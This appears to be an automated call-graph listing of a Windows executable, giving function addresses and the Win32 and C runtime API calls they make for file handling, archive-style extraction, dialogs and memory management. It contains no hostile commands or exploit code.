GetFileAttributesW 23731->23732 23733 e3a261 23732->23733 23734 e3a23a 23732->23734 23735 e3bb03 GetCurrentDirectoryW 23733->23735 23734->23707 23734->23724 23736 e3a275 23735->23736 23736->23734 23737 e3a279 GetFileAttributesW 23736->23737 23737->23734 23739 e3407c __vswprintf_c_l 23738->23739 23742 e55fd4 23739->23742 23745 e54097 23742->23745 23746 e540d7 23745->23746 23747 e540bf 23745->23747 23746->23747 23749 e540df 23746->23749 23769 e591a8 20 API calls _abort 23747->23769 23771 e54636 23749->23771 23750 e540c4 23770 e59087 26 API calls _abort 23750->23770 23756 e54167 23780 e549e6 51 API calls 3 library calls 23756->23780 23757 e34086 23757->23503 23760 e540cf 23762 e4fbbc 23760->23762 23761 e54172 23781 e546b9 20 API calls _free 23761->23781 23763 e4fbc4 23762->23763 23764 e4fbc5 IsProcessorFeaturePresent 23762->23764 23763->23757 23766 e4fc07 23764->23766 23782 e4fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23766->23782 23768 e4fcea 23768->23757 23769->23750 23770->23760 23772 e54653 23771->23772 23773 e540ef 23771->23773 23772->23773 23783 e597e5 GetLastError 23772->23783 23779 e54601 20 API calls 2 library calls 23773->23779 23775 e54674 23803 e5993a 38 API calls __cftof 23775->23803 23777 e5468d 23804 e59967 38 API calls __cftof 23777->23804 23779->23756 23780->23761 23781->23760 23782->23768 23784 e59801 23783->23784 23785 e597fb 23783->23785 23790 e59850 SetLastError 23784->23790 23806 e5b136 23784->23806 23805 e5ae5b 11 API calls 2 library calls 23785->23805 23789 e5981b 23813 e58dcc 23789->23813 23790->23775 23793 e59830 23793->23789 23795 e59837 23793->23795 23794 e59821 23796 e5985c SetLastError 23794->23796 23820 e59649 20 API calls _abort 23795->23820 23821 e58d24 38 API calls _abort 23796->23821 23799 e59842 23801 e58dcc _free 20 API calls 23799->23801 23802 e59849 23801->23802 23802->23790 23802->23796 23803->23777 23804->23773 23805->23784 23807 e5b143 _abort 23806->23807 23808 e5b183 23807->23808 23809 e5b16e RtlAllocateHeap 23807->23809 23822 e57a5e 7 API calls 2 library calls 23807->23822 23823 e591a8 20 API calls _abort 23808->23823 23809->23807 23811 e59813 23809->23811 23811->23789 23819 e5aeb1 11 API calls 2 library calls 23811->23819 23814 e58dd7 RtlFreeHeap 23813->23814 23818 e58e00 _free 23813->23818 23815 e58dec 23814->23815 23814->23818 23824 e591a8 20 API calls _abort 23815->23824 23817 e58df2 GetLastError 23817->23818 23818->23794 23819->23793 23820->23799 23822->23807 23823->23811 23824->23817 23826 e39781 23825->23826 23827 e39757 23825->23827 23826->23587 23827->23826 23836 e3a1e0 23827->23836 23831 e3962c 23830->23831 23832 e3964a 23830->23832 23831->23832 23834 e39638 CloseHandle 23831->23834 23833 e39669 23832->23833 23844 e36bd5 76 API calls 23832->23844 23833->23587 23834->23832 23837 e4ec50 23836->23837 23838 e3a1ed DeleteFileW 23837->23838 23839 e3a200 23838->23839 23840 e3977f 23838->23840 23841 e3bb03 GetCurrentDirectoryW 23839->23841 23840->23587 23842 e3a214 23841->23842 23842->23840 23843 e3a218 DeleteFileW 23842->23843 23843->23840 23844->23833 23851 e3d9b0 23845->23851 23848 e3e645 SetDlgItemTextW 23848->23599 23849 e3e66b LoadStringW 23849->23848 23850 e3e682 LoadStringW 23849->23850 23850->23848 23856 e3d8ec 23851->23856 23853 e3d9cd 23854 e3d9e2 23853->23854 23864 e3d9f0 26 API calls 23853->23864 23854->23848 23854->23849 23857 e3d904 23856->23857 23858 e3d984 _strncpy 23856->23858 23860 e3d928 23857->23860 23865 e41da7 WideCharToMultiByte 23857->23865 23858->23853 23863 e3d959 23860->23863 23866 e3e5b1 50 API calls __vsnprintf 23860->23866 23867 e56159 26 API calls 3 library calls 23863->23867 23864->23854 23865->23860 23866->23863 23867->23858 23869 e4b31e 23868->23869 23870 e4b3f0 ExpandEnvironmentStringsW 23869->23870 23871 e4b40d 23869->23871 23870->23871 23871->23603 23872->23603 23873->23603 23874->23624 23875->23603 23876->23603 23877->23603 23879 e58e54 23878->23879 23880 e58e61 23879->23880 23881 e58e6c 23879->23881 23891 e58e06 23880->23891 23883 e58e74 23881->23883 23889 e58e7d _abort 23881->23889 23884 e58dcc _free 20 API calls 23883->23884 23887 e58e69 23884->23887 23885 e58ea7 HeapReAlloc 23885->23887 23885->23889 23886 e58e82 23898 e591a8 20 API calls _abort 23886->23898 23887->23603 23889->23885 23889->23886 23899 e57a5e 7 API calls 2 library calls 23889->23899 23892 e58e44 23891->23892 23897 e58e14 _abort 23891->23897 23901 e591a8 20 API calls _abort 23892->23901 23894 e58e2f RtlAllocateHeap 23895 e58e42 23894->23895 23894->23897 23895->23887 23897->23892 23897->23894 23900 e57a5e 7 API calls 2 library calls 23897->23900 23898->23887 23899->23889 23900->23897 23901->23895 23903 e40666 _wcslen 23902->23903 23930 e317e9 23903->23930 23905 e4067e 23905->23628 23907 e40659 _wcslen 23906->23907 23908 e317e9 78 API calls 23907->23908 23909 e4067e 23908->23909 23909->23630 23911 e37b17 __EH_prolog 23910->23911 23947 e3ce40 23911->23947 23913 e37b32 23953 e4eb38 23913->23953 23915 e37b5c 23962 e44a76 23915->23962 23918 e37c7d 23919 e37c87 23918->23919 23921 e37cf1 23919->23921 23994 e3a56d 23919->23994 23923 e37d50 23921->23923 23972 e38284 23921->23972 23922 e37d92 23922->23634 23923->23922 24000 e3138b 74 API calls 23923->24000 23927 e37bac 23926->23927 23929 e37bb3 23926->23929 23928 e42297 86 API calls 23927->23928 23928->23929 23932 e317ff 23930->23932 23942 e3185a __InternalCxxFrameHandler 23930->23942 23931 e31828 23934 e31887 23931->23934 23939 e31847 ___std_exception_copy 23931->23939 23932->23931 23943 e36c36 76 API calls __vswprintf_c_l 23932->23943 23936 e53e3e 22 API calls 23934->23936 23935 e3181e 23944 e36ca7 75 API calls 23935->23944 23938 e3188e 23936->23938 23938->23942 23946 e36ca7 75 API calls 23938->23946 23939->23942 23945 e36ca7 75 API calls 23939->23945 23942->23905 23943->23935 23944->23931 23945->23942 23946->23942 23948 e3ce4a __EH_prolog 23947->23948 23949 e4eb38 8 API calls 23948->23949 23950 e3ce8d 23949->23950 23951 e4eb38 8 API calls 23950->23951 23952 e3ceb1 23951->23952 23952->23913 23955 e4eb3d ___std_exception_copy 23953->23955 23954 e4eb57 23954->23915 23955->23954 23958 e4eb59 23955->23958 23968 e57a5e 7 API calls 2 library calls 23955->23968 23957 e4f5c9 23970 e5238d RaiseException 23957->23970 23958->23957 23969 e5238d RaiseException 23958->23969 23961 e4f5e6 23963 e44a80 __EH_prolog 23962->23963 23964 e4eb38 8 API calls 23963->23964 23965 e44a9c 23964->23965 23966 e37b8b 23965->23966 23971 e40e46 80 API calls 23965->23971 23966->23918 23968->23955 23969->23957 23970->23961 23971->23966 23973 e3828e __EH_prolog 23972->23973 24001 e313dc 23973->24001 23975 e382aa 23976 e382bb 23975->23976 24144 e39f42 23975->24144 23979 e382f2 23976->23979 24009 e31a04 23976->24009 24140 e31692 23979->24140 23982 e382ee 23982->23979 23991 e3a56d 7 API calls 23982->23991 23992 e38389 23982->23992 24148 e3c0c5 CompareStringW _wcslen 23982->24148 23985 e383e8 24036 e31f6d 23985->24036 23989 e383f3 23989->23979 24040 e33b2d 23989->24040 24052 e3848e 23989->24052 23991->23982 24028 e38430 23992->24028 23995 e3a582 23994->23995 23996 e3a5b0 23995->23996 24423 e3a69b 23995->24423 23996->23919 23998 e3a592 23998->23996 23999 e3a597 FindClose 23998->23999 23999->23996 24000->23922 24002 e313e1 __EH_prolog 24001->24002 24003 e3ce40 8 API calls 24002->24003 24004 e31419 24003->24004 24005 e4eb38 8 API calls 24004->24005 24008 e31474 __cftof 24004->24008 24006 e31461 24005->24006 24006->24008 24149 e3b505 24006->24149 24008->23975 24010 e31a0e __EH_prolog 24009->24010 24022 e31a61 24010->24022 24024 e31b9b 24010->24024 24165 e313ba 24010->24165 24012 e31bc7 24177 e3138b 74 API calls 24012->24177 24015 e33b2d 101 API calls 24019 e31c12 24015->24019 24016 e31bd4 24016->24015 24016->24024 24017 e31c5a 24021 e31c8d 24017->24021 24017->24024 24178 e3138b 74 API calls 24017->24178 24019->24017 24020 e33b2d 101 API calls 24019->24020 24020->24019 24021->24024 24026 e39e80 79 API calls 24021->24026 24022->24012 24022->24016 24022->24024 24023 e33b2d 101 API calls 24025 e31cde 24023->24025 24024->23982 24025->24023 24025->24024 24026->24025 24198 e3cf3d 24028->24198 24030 e38440 24202 e413d2 GetSystemTime SystemTimeToFileTime 24030->24202 24032 e383a3 24032->23985 24033 e41b66 24032->24033 24207 e4de6b 24033->24207 24037 e31f72 __EH_prolog 24036->24037 24039 e31fa6 24037->24039 24215 e319af 24037->24215 24039->23989 24041 e33b39 24040->24041 24042 e33b3d 24040->24042 24041->23989 24051 e39e80 79 API calls 24042->24051 24043 e33b4f 24044 e33b6a 24043->24044 24045 e33b78 24043->24045 24047 e33baa 24044->24047 24345 e332f7 89 API calls 2 library calls 24044->24345 24346 e3286b 101 API calls 3 library calls 24045->24346 24047->23989 24049 e33b76 24049->24047 24347 e320d7 74 API calls 24049->24347 24051->24043 24053 e38498 __EH_prolog 24052->24053 24056 e384d5 24053->24056 24063 e38513 24053->24063 24372 e48c8d 103 API calls 24053->24372 24055 e384f5 24057 e384fa 24055->24057 24058 e3851c 24055->24058 24056->24055 24061 e3857a 24056->24061 24056->24063 24057->24063 24373 e37a0d 152 API calls 24057->24373 24058->24063 24374 e48c8d 103 API calls 24058->24374 24061->24063 24348 e35d1a 24061->24348 24063->23989 24064 e38605 24064->24063 24354 e38167 24064->24354 24067 e38797 24068 e3a56d 7 API calls 24067->24068 24069 e38802 24067->24069 24068->24069 24360 e37c0d 24069->24360 24071 e3d051 82 API calls 24077 e3885d 24071->24077 24072 e3898b 24377 e32021 74 API calls 24072->24377 24073 e38a5f 24078 e38ab6 24073->24078 24092 e38a6a 24073->24092 24074 e38992 24074->24073 24080 e389e1 24074->24080 24077->24063 24077->24071 24077->24072 24077->24074 24375 e38117 84 API calls 24077->24375 24376 e32021 74 API calls 24077->24376 24084 e38a4c 24078->24084 24380 e37fc0 97 API calls 24078->24380 24079 e38ab4 24085 e3959a 80 API calls 24079->24085 24081 e38b14 24080->24081 24080->24084 24086 e3a231 3 API calls 24080->24086 24082 e38b82 24081->24082 24129 e39105 24081->24129 24381 e398bc 24081->24381 24090 e3ab1a 8 API calls 24082->24090 24083 e3959a 80 API calls 24083->24063 24084->24079 24084->24081 24085->24063 24088 e38a19 24086->24088 24088->24084 24378 e392a3 97 API calls 24088->24378 24093 e38bd1 24090->24093 24092->24079 24379 e37db2 101 API calls 24092->24379 24095 e3ab1a 8 API calls 24093->24095 24113 e38be7 24095->24113 24098 e38b70 24385 e36e98 77 API calls 24098->24385 24100 e38cbc 24101 e38e40 24100->24101 24102 e38d18 24100->24102 24105 e38e52 24101->24105 24106 e38e66 24101->24106 24110 e38d49 24101->24110 24103 e38d8a 24102->24103 24104 e38d28 24102->24104 24111 e38167 19 API calls 24103->24111 24107 e38d6e 24104->24107 24114 e38d37 24104->24114 24108 e39215 123 API calls 24105->24108 24109 e43377 75 API calls 24106->24109 24107->24110 24388 e377b8 111 API calls 24107->24388 24108->24110 24112 e38e7f 24109->24112 24128 e38f85 24110->24128 24392 e32021 74 API calls 24110->24392 24115 e38dbd 24111->24115 24391 e43020 123 API calls 24112->24391 24113->24100 24120 e3981a 79 API calls 24113->24120 24123 e38c93 24113->24123 24387 e32021 74 API calls 24114->24387 24115->24110 24121 e38de6 24115->24121 24122 e38df5 24115->24122 24120->24123 24389 e37542 85 API calls 24121->24389 24390 e39155 93 API calls __EH_prolog 24122->24390 24123->24100 24386 e39a3c 82 API calls 24123->24386 24127 e39090 24127->24129 24131 e3a4ed 3 API calls 24127->24131 24128->24127 24128->24129 24130 e3903e 24128->24130 24366 e39f09 SetEndOfFile 24128->24366 24129->24083 24367 e39da2 24130->24367 24134 e390eb 24131->24134 24134->24129 24393 e32021 74 API calls 24134->24393 24135 e39085 24137 e39620 77 API calls 24135->24137 24137->24127 24138 e390fb 24394 e36dcb 76 API calls _wcschr 24138->24394 24141 e316a4 24140->24141 24410 e3cee1 24141->24410 24145 e39f59 24144->24145 24146 e39f63 24145->24146 24422 e36d0c 78 API calls 24145->24422 24146->23976 24148->23982 24150 e3b50f __EH_prolog 24149->24150 24155 e3f1d0 82 API calls 24150->24155 24152 e3b521 24156 e3b61e 24152->24156 24155->24152 24157 e3b630 __cftof 24156->24157 24160 e410dc 24157->24160 24163 e4109e GetCurrentProcess GetProcessAffinityMask 24160->24163 24164 e3b597 24163->24164 24164->24008 24179 e31732 24165->24179 24167 e313d6 24168 e39e80 24167->24168 24169 e39e92 24168->24169 24174 e39ea5 24168->24174 24173 e39eb0 24169->24173 24196 e36d5b 77 API calls 24169->24196 24170 e39eb8 SetFilePointer 24172 e39ed4 GetLastError 24170->24172 24170->24173 24172->24173 24175 e39ede 24172->24175 24173->24022 24174->24170 24174->24173 24175->24173 24197 e36d5b 77 API calls 24175->24197 24177->24024 24178->24021 24180 e317a0 __InternalCxxFrameHandler 24179->24180 24181 e31748 24179->24181 24180->24167 24182 e31771 24181->24182 24192 e36c36 76 API calls __vswprintf_c_l 24181->24192 24183 e317c7 24182->24183 24189 e3178d ___std_exception_copy 24182->24189 24185 e53e3e 22 API calls 24183->24185 24187 e317ce 24185->24187 24186 e31767 24193 e36ca7 75 API calls 24186->24193 24187->24180 24195 e36ca7 75 API calls 24187->24195 24189->24180 24194 e36ca7 75 API calls 24189->24194 24192->24186 24193->24182 24194->24180 24195->24180 24196->24174 24197->24173 24199 e3cf4d 24198->24199 24201 e3cf54 24198->24201 24203 e3981a 24199->24203 24201->24030 24202->24032 24204 e39833 24203->24204 24206 e39e80 79 API calls 24204->24206 24205 e39865 24205->24201 24206->24205 24208 e4de78 24207->24208 24209 e3e617 53 API calls 24208->24209 24210 e4de9b 24209->24210 24211 e34092 _swprintf 51 API calls 24210->24211 24212 e4dead 24211->24212 24213 e4d4d4 16 API calls 24212->24213 24214 e41b7c 24213->24214 24214->23985 24216 e319bf 24215->24216 24218 e319bb 24215->24218 24219 e318f6 24216->24219 24218->24039 24220 e31908 24219->24220 24221 e31945 24219->24221 24222 e33b2d 101 API calls 24220->24222 24227 e33fa3 24221->24227 24225 e31928 24222->24225 24225->24218 24231 e33fac 24227->24231 24228 e33b2d 101 API calls 24228->24231 24229 e31966 24229->24225 24232 e31e50 24229->24232 24231->24228 24231->24229 24244 e40e08 24231->24244 24233 e31e5a __EH_prolog 24232->24233 24252 e33bba 24233->24252 24235 e31e84 24236 e31732 78 API calls 24235->24236 24238 e31f0b 24235->24238 24237 e31e9b 24236->24237 24280 e318a9 78 API calls 24237->24280 24238->24225 24240 e31eb3 24242 e31ebf _wcslen 24240->24242 24281 e41b84 MultiByteToWideChar 24240->24281 24282 e318a9 78 API calls 24242->24282 24245 e40e0f 24244->24245 24246 e40e2a 24245->24246 24250 e36c31 RaiseException _com_raise_error 24245->24250 24248 e40e3b SetThreadExecutionState 24246->24248 24251 e36c31 RaiseException _com_raise_error 24246->24251 24248->24231 24250->24246 24251->24248 24253 e33bc4 __EH_prolog 24252->24253 24254 e33bf6 24253->24254 24255 e33bda 24253->24255 24257 e33e51 24254->24257 24260 e33c22 24254->24260 24308 e3138b 74 API calls 24255->24308 24325 e3138b 74 API calls 24257->24325 24259 e33be5 24259->24235 24260->24259 24283 e43377 24260->24283 24262 e33ca3 24264 e33d2e 24262->24264 24279 e33c9a 24262->24279 24311 e3d051 24262->24311 24263 e33c9f 24263->24262 24310 e320bd 78 API calls 24263->24310 24293 e3ab1a 24264->24293 24266 e33c71 24266->24262 24266->24263 24267 e33c8f 24266->24267 24309 e3138b 74 API calls 24267->24309 24269 e33d41 24273 e33dd7 24269->24273 24274 e33dc7 24269->24274 24317 e43020 123 API calls 24273->24317 24297 e39215 24274->24297 24277 e33dd5 24277->24279 24318 e32021 74 API calls 24277->24318 24319 e42297 24279->24319 24280->24240 24281->24242 24282->24238 24284 e4338c 24283->24284 24286 e43396 ___std_exception_copy 24283->24286 24326 e36ca7 75 API calls 24284->24326 24287 e434c6 24286->24287 24290 e4341c 24286->24290 24292 e43440 __cftof 24286->24292 24328 e5238d RaiseException 24287->24328 24327 e432aa 75 API calls 3 library calls 24290->24327 24291 e434f2 24292->24266 24294 e3ab28 24293->24294 24296 e3ab32 24293->24296 24295 e4eb38 8 API calls 24294->24295 24295->24296 24296->24269 24298 e3921f __EH_prolog 24297->24298 24329 e37c64 24298->24329 24301 e313ba 78 API calls 24302 e39231 24301->24302 24332 e3d114 24302->24332 24304 e39243 24305 e3928a 24304->24305 24307 e3d114 118 API calls 24304->24307 24341 e3d300 97 API calls __InternalCxxFrameHandler 24304->24341 24305->24277 24307->24304 24308->24259 24309->24279 24310->24262 24312 e3d072 24311->24312 24313 e3d084 24311->24313 24342 e3603a 82 API calls 24312->24342 24343 e3603a 82 API calls 24313->24343 24316 e3d07c 24316->24264 24317->24277 24318->24279 24321 e422a1 24319->24321 24320 e422ba 24344 e40eed 86 API calls 24320->24344 24321->24320 24324 e422ce 24321->24324 24323 e422c1 24323->24324 24325->24259 24326->24286 24327->24292 24328->24291 24330 e3b146 GetVersionExW 24329->24330 24331 e37c69 24330->24331 24331->24301 24338 e3d12a __InternalCxxFrameHandler 24332->24338 24333 e3d29a 24334 e3d0cb 6 API calls 24333->24334 24336 e3d2ce 24333->24336 24334->24336 24335 e40e08 SetThreadExecutionState RaiseException 24339 e3d291 24335->24339 24336->24335 24337 e48c8d 103 API calls 24337->24338 24338->24333 24338->24337 24338->24339 24340 e3ac05 91 API calls 24338->24340 24339->24304 24340->24338 24341->24304 24342->24316 24343->24316 24344->24323 24345->24049 24346->24049 24347->24047 24349 e35d2a 24348->24349 24395 e35c4b 24349->24395 24352 e35d5d 24353 e35d95 24352->24353 24400 e3b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24352->24400 24353->24064 24355 e38186 24354->24355 24356 e38232 24355->24356 24407 e3be5e 19 API calls __InternalCxxFrameHandler 24355->24407 24406 e41fac CharUpperW 24356->24406 24359 e3823b 24359->24067 24361 e37c22 24360->24361 24362 e37c5a 24361->24362 24408 e36e7a 74 API calls 24361->24408 24362->24077 24364 e37c52 24409 e3138b 74 API calls 24364->24409 24366->24130 24368 e39db3 24367->24368 24371 e39dc2 24367->24371 24369 e39db9 FlushFileBuffers 24368->24369 24368->24371 24369->24371 24370 e39e3f SetFileTime 24370->24135 24371->24370 24372->24056 24373->24063 24374->24063 24375->24077 24376->24077 24377->24074 24378->24084 24379->24079 24380->24084 24382 e38b5a 24381->24382 24383 e398c5 GetFileType 24381->24383 24382->24082 24384 e32021 74 API calls 24382->24384 24383->24382 24384->24098 24385->24082 24386->24100 24387->24110 24388->24110 24389->24110 24390->24110 24391->24110 24392->24128 24393->24138 24394->24129 24401 e35b48 24395->24401 24397 e35c6c 24397->24352 24399 e35b48 2 API calls 24399->24397 24400->24352 24404 e35b52 24401->24404 24402 e35c3a 24402->24397 24402->24399 24404->24402 24405 e3b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24404->24405 24405->24404 24406->24359 24407->24356 24408->24364 24409->24362 24411 e3cef2 24410->24411 24416 e3a99e 24411->24416 24413 e3cf24 24414 e3a99e 86 API calls 24413->24414 24415 e3cf2f 24414->24415 24417 e3a9c1 24416->24417 24420 e3a9d5 24416->24420 24421 e40eed 86 API calls 24417->24421 24419 e3a9c8 24419->24420 24420->24413 24421->24419 24422->24146 24424 e3a6a8 24423->24424 24425 e3a6c1 FindFirstFileW 24424->24425 24426 e3a727 FindNextFileW 24424->24426 24428 e3a6d0 24425->24428 24433 e3a709 24425->24433 24427 e3a732 GetLastError 24426->24427 24426->24433 24427->24433 24429 e3bb03 GetCurrentDirectoryW 24428->24429 24430 e3a6e0 24429->24430 24431 e3a6e4 FindFirstFileW 24430->24431 24432 e3a6fe GetLastError 24430->24432 24431->24432 24431->24433 24432->24433 24433->23998 24443 e4a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24434->24443 24436 e4a5cd 24437 e4a5d9 24436->24437 24444 e4a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24436->24444 24437->23641 24437->23642 24439->23648 24440->23651 24441->23651 24442->23654 24443->24436 24444->24437 24445->23662 24447 e39f42 78 API calls 24446->24447 24448 e31fe8 24447->24448 24449 e31a04 101 API calls 24448->24449 24452 e32005 24448->24452 24450 e31ff5 24449->24450 24450->24452 24453 e3138b 74 API calls 24450->24453 24452->23670 24452->23671 24453->24452 24455 e4b583 GetMessageW 24454->24455 24456 e4b5bc GetDlgItem 24454->24456 24457 e4b5a8 TranslateMessage DispatchMessageW 24455->24457 24458 e4b599 IsDialogMessageW 24455->24458 24456->23681 24456->23682 24457->24456 24458->24456 24458->24457 25272 e494e0 GetClientRect 25307 e421e0 26 API calls std::bad_exception::bad_exception 25333 e4f2e0 46 API calls __RTC_Initialize 25334 e5bee0 GetCommandLineA GetCommandLineW 25308 e3f1e8 FreeLibrary 25309 e395f0 80 API calls 25335 e35ef0 82 API calls 24466 e598f0 24474 e5adaf 24466->24474 24470 e5990c 24471 e59919 24470->24471 24482 e59920 11 API calls 24470->24482 24473 e59904 24483 e5ac98 24474->24483 24477 e5adee TlsAlloc 24478 e5addf 24477->24478 24479 e4fbbc CatchGuardHandler 5 API calls 24478->24479 24480 e598fa 24479->24480 24480->24473 24481 e59869 20 API calls 2 library calls 24480->24481 24481->24470 24482->24473 24484 e5acc8 24483->24484 24487 e5acc4 24483->24487 24484->24477 24484->24478 24485 e5ace8 24485->24484 24488 e5acf4 GetProcAddress 24485->24488 24487->24484 24487->24485 24490 e5ad34 24487->24490 24489 e5ad04 _abort 24488->24489 24489->24484 24491 e5ad55 LoadLibraryExW 24490->24491 24495 e5ad4a 24490->24495 24492 e5ad72 GetLastError 24491->24492 24493 e5ad8a 24491->24493 24492->24493 24496 e5ad7d LoadLibraryExW 24492->24496 24494 e5ada1 FreeLibrary 24493->24494 24493->24495 24494->24495 24495->24487 24496->24493 24497 e5abf0 24499 e5abfb 24497->24499 24500 e5ac24 24499->24500 24501 e5ac20 24499->24501 24503 e5af0a 24499->24503 24510 e5ac50 DeleteCriticalSection 24500->24510 24504 e5ac98 _abort 5 API calls 24503->24504 24505 e5af31 24504->24505 24506 e5af4f InitializeCriticalSectionAndSpinCount 24505->24506 24509 e5af3a 24505->24509 24506->24509 24507 e4fbbc CatchGuardHandler 5 API calls 24508 e5af66 24507->24508 24508->24499 24509->24507 24510->24501 25273 e588f0 7 API calls ___scrt_uninitialize_crt 25311 e4fd4f 9 API calls 2 library calls 25275 e52cfb 38 API calls 4 library calls 25312 e4b5c0 100 API calls 25350 e477c0 118 API calls 25351 e4ffc0 RaiseException _com_raise_error _com_error::_com_error 24537 e4dec2 24538 e4decf 24537->24538 24539 e3e617 53 API calls 24538->24539 24540 e4dedc 24539->24540 24541 e34092 _swprintf 51 API calls 24540->24541 24542 e4def1 SetDlgItemTextW 24541->24542 24543 e4b568 5 API calls 24542->24543 24544 e4df0e 24543->24544 25337 e462ca 123 API calls __InternalCxxFrameHandler 24551 e4e2d7 24552 e4e1db 24551->24552 24553 e4e85d ___delayLoadHelper2@8 14 API calls 24552->24553 24553->24552 24555 e4e1d1 14 API calls ___delayLoadHelper2@8 25353 e5a3d0 21 API calls 2 library calls 24556 e310d5 24561 e35abd 24556->24561 24562 e35ac7 __EH_prolog 24561->24562 24563 e3b505 84 API calls 24562->24563 24564 e35ad3 24563->24564 24568 e35cac GetCurrentProcess GetProcessAffinityMask 24564->24568 25354 e62bd0 VariantClear 25277 e4f4d3 20 API calls 25339 e50ada 51 API calls 2 library calls 25314 e4eda7 48 API calls _unexpected 25355 e4f3a0 27 API calls 25280 e5a4a0 71 API calls _free 25281 e4dca1 DialogBoxParamW 25282 e608a0 IsProcessorFeaturePresent 25356 e36faa 111 API calls 3 library calls 25316 e4b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24767 e4f3b2 24768 e4f3be __FrameHandler3::FrameUnwindToState 24767->24768 24799 e4eed7 24768->24799 24770 e4f3c5 24771 e4f518 24770->24771 24774 e4f3ef 24770->24774 24872 e4f838 4 API calls 2 library calls 24771->24872 24773 e4f51f 24865 e57f58 24773->24865 24785 e4f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24774->24785 24810 e58aed 24774->24810 24781 e4f40e 24783 e4f48f 24818 e4f953 GetStartupInfoW __cftof 24783->24818 24785->24783 24868 e57af4 38 API calls _abort 24785->24868 24786 e4f495 24819 e58a3e 51 API calls 24786->24819 24789 e4f49d 24820 e4df1e 24789->24820 24793 e4f4b1 24793->24773 24794 e4f4b5 24793->24794 24795 e4f4be 24794->24795 24870 e57efb 28 API calls _abort 24794->24870 24871 e4f048 12 API calls ___scrt_uninitialize_crt 24795->24871 24798 e4f4c6 24798->24781 24800 e4eee0 24799->24800 24874 e4f654 IsProcessorFeaturePresent 24800->24874 24802 e4eeec 24875 e52a5e 24802->24875 24804 e4eef1 24809 e4eef5 24804->24809 24883 e58977 24804->24883 24807 e4ef0c 24807->24770 24809->24770 24811 e58b04 24810->24811 24812 e4fbbc CatchGuardHandler 5 API calls 24811->24812 24813 e4f408 24812->24813 24813->24781 24814 e58a91 24813->24814 24815 e58ac0 24814->24815 24816 e4fbbc CatchGuardHandler 5 API calls 24815->24816 24817 e58ae9 24816->24817 24817->24785 24818->24786 24819->24789 24976 e40863 24820->24976 24824 e4df3d 25025 e4ac16 24824->25025 24826 e4df46 __cftof 24827 e4df59 GetCommandLineW 24826->24827 24828 e4dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24827->24828 24829 e4df68 24827->24829 24830 e34092 _swprintf 51 API calls 24828->24830 25029 e4c5c4 24829->25029 24832 e4e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24830->24832 25040 e4b6dd LoadBitmapW 24832->25040 24835 e4df76 OpenFileMappingW 24838 e4dfd6 CloseHandle 24835->24838 24839 e4df8f MapViewOfFile 24835->24839 24836 e4dfe0 25034 e4dbde 24836->25034 24838->24828 24842 e4dfa0 __InternalCxxFrameHandler 24839->24842 24843 e4dfcd UnmapViewOfFile 24839->24843 24847 e4dbde 2 API calls 24842->24847 24843->24838 24849 e4dfbc 24847->24849 24848 e490b7 8 API calls 24850 e4e0aa DialogBoxParamW 24848->24850 24849->24843 24851 e4e0e4 24850->24851 24852 e4e0f6 Sleep 24851->24852 24853 e4e0fd 24851->24853 24852->24853 24855 e4e10b 24853->24855 25070 e4ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24853->25070 24856 e4e12a DeleteObject 24855->24856 24857 e4e146 24856->24857 24858 e4e13f DeleteObject 24856->24858 24859 e4e177 24857->24859 24860 e4e189 24857->24860 24858->24857 25071 e4dc3b 6 API calls 24859->25071 25067 e4ac7c 24860->25067 24862 e4e17d CloseHandle 24862->24860 24864 e4e1c3 24869 e4f993 GetModuleHandleW 24864->24869 25201 e57cd5 24865->25201 24868->24783 24869->24793 24870->24795 24871->24798 24872->24773 24874->24802 24887 e53b07 24875->24887 24879 e52a6f 24880 e52a7a 24879->24880 24901 e53b43 DeleteCriticalSection 24879->24901 24880->24804 24882 e52a67 24882->24804 24930 e5c05a 24883->24930 24886 e52a7d 7 API calls 2 library calls 24886->24809 24888 e53b10 24887->24888 24890 e53b39 24888->24890 24891 e52a63 24888->24891 24902 e53d46 24888->24902 24907 e53b43 DeleteCriticalSection 24890->24907 24891->24882 24893 e52b8c 24891->24893 24923 e53c57 24893->24923 24896 e52ba1 24896->24879 24898 e52baf 24899 e52bbc 24898->24899 24929 e52bbf 6 API calls ___vcrt_FlsFree 24898->24929 24899->24879 24901->24882 24908 e53c0d 24902->24908 24905 e53d7e InitializeCriticalSectionAndSpinCount 24906 e53d69 24905->24906 24906->24888 24907->24891 24909 e53c26 24908->24909 24910 e53c4f 24908->24910 24909->24910 24915 e53b72 24909->24915 24910->24905 24910->24906 24913 e53c3b GetProcAddress 24913->24910 24914 e53c49 24913->24914 24914->24910 24921 e53b7e ___vcrt_FlsFree 24915->24921 24916 e53bf3 24916->24910 24916->24913 24917 e53b95 LoadLibraryExW 24918 e53bb3 GetLastError 24917->24918 24919 e53bfa 24917->24919 24918->24921 24919->24916 24920 e53c02 FreeLibrary 24919->24920 24920->24916 24921->24916 24921->24917 24922 e53bd5 LoadLibraryExW 24921->24922 24922->24919 24922->24921 24924 e53c0d ___vcrt_FlsFree 5 API calls 24923->24924 24925 e53c71 24924->24925 24926 e53c8a TlsAlloc 24925->24926 24927 e52b96 24925->24927 24927->24896 24928 e53d08 6 API calls ___vcrt_FlsFree 24927->24928 24928->24898 24929->24896 24933 e5c077 24930->24933 24934 e5c073 24930->24934 24931 e4fbbc CatchGuardHandler 5 API calls 24932 e4eefe 24931->24932 24932->24807 24932->24886 24933->24934 24936 e5a6a0 24933->24936 24934->24931 24937 e5a6ac __FrameHandler3::FrameUnwindToState 24936->24937 24948 e5ac31 EnterCriticalSection 24937->24948 24939 e5a6b3 24949 e5c528 24939->24949 24941 e5a6c2 24942 e5a6d1 24941->24942 24962 e5a529 29 API calls 24941->24962 24964 e5a6ed LeaveCriticalSection _abort 24942->24964 24945 e5a6cc 24963 e5a5df GetStdHandle GetFileType 24945->24963 24946 e5a6e2 _abort 24946->24933 24948->24939 24950 e5c534 __FrameHandler3::FrameUnwindToState 24949->24950 24951 e5c541 24950->24951 24952 e5c558 24950->24952 24973 e591a8 20 API calls _abort 